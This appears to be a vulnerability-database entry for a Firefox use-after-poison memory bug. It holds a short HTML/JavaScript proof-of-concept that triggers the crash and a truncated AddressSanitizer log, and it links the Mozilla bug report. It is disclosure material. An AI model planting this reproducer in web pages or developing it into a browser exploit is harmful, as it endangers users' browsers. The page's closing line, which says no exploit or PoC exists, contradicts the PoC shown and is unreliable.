Mozilla Firefox: use-after-poison in...

- AV AC AU C I A
发布: 2025-04-13
修订: 2025-04-13

Mozilla bug tracker link: https://bugzilla.mozilla.org/show_bug.cgi?id=1340593 There is a use-after-poison issue in Firefox. The vulnerability was confirmed on the nightly ASan build. PoC: ``` <style> * { padding: inherit; } </style> <script> function go() { var s = menu.style; s.setProperty("scroll-snap-destination", "1px 63%"); s.setProperty("padding-left", "66%"); button.scrollBy({left: 60, top: -1}); th.vAlign = "top"; s.setProperty("animation-fill-mode", "forwards"); } </script> <body onload=go()> <button id="button" hidden="hidden"></button> <table> <th id="th">foo</th> <menu id="menu"> <menu>foo</menu> ``` ASan log: ``` ==78996==ERROR: AddressSanitizer: use-after-poison on address 0x625000b05790 at pc 0x7efe7287f223 bp 0x7ffc444d1e00 sp 0x7ffc444d1df8 READ of size 1 at 0x625000b05790 thread T0 #0 0x7efe7287f222 in ConvertsToLength /home/worker/workspace/build/src/obj-firefox/dist/include/nsStyleCoord.h:355:43 #1 0x7efe7287f222 in nsStylePadding::GetPadding(nsMargin&) const...

0%
暂无可用Exp或PoC
当前有0条受影响产品信息